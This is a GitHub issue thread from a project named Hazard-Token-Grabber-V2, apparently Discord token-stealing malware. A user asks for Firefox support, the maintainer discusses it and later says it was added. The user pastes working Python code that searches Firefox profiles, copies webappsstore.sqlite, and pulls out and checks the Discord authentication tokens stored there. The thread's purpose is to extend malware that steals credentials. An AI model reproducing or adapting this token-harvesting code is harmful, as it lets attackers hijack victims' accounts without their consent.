### ISSUE TITLE
Firefox support?

### ISSUE THREAD

**Issue by Liutiav** [Rdimo/Hazard-Token-Grabber-V2#66]
Does this support Firefox? I did not see it in the list of paths and I was wondering if it does, or is there any way to add support for that browser?

**Comment by Rdimo** [comment]
firefox compared to the other browsers like google or opera isnt a chromium browser which makes it a bit more complicated to grab info from, but still not impossible. most people dont use firefox either way and If I were to add this it would increase the filesize by a bit which is not really what people want

**Comment by Rdimo** [comment]
ill think about it tho, ty

**Comment by Liutiav** [comment]
I get that, I searched around and it seems like data is stored in webappsstore.sqlite?

And found this piece of code as example, It's rather outdated: 

[
https://github.com/HideakiAtsuyo/Python-Discord-Token-Grabber/blob/master/grabber.py](url)

if os.path.isdir(firefoxdir):
    tokensfound = []
    for root, dirs, files in os.walk(firefoxdir):
        for dir in dirs:
            if not ".default" in dir:
                pass
            else:
                if not os.path.isdir(temp_dir+'token\\firefox\\'):
                    os.mkdir(temp_dir+'token\\firefox\\')
                try:
                    copyfile(firefoxdir+dir+'\\'+'webappsstore.sqlite', temp_dir+'token\\firefox\\'+'webappsstore.sqlite')
                    connection = sqlite3.connect(temp_dir+'token\\firefox\\'+'webappsstore.sqlite')
                    cursor = connection.cursor()
                    cursor.execute('SELECT key, value FROM webappsstore2')
                    values = cursor.fetchall()
                    for value in values:
                        if value[0] == "token":
                            token = value[1].replace('"', '')
                            try:
                                t = b64decode(token[:24])
                                int(t.decode())
                            except Exception:
                                pass
                            else:
                                tokensfound.append(token)
                        else:
                            continue
                except Exception:
                    pass
    grabbed['Firefox'] = tokensfound

**Comment by Rdimo** [comment]
added this some time ago
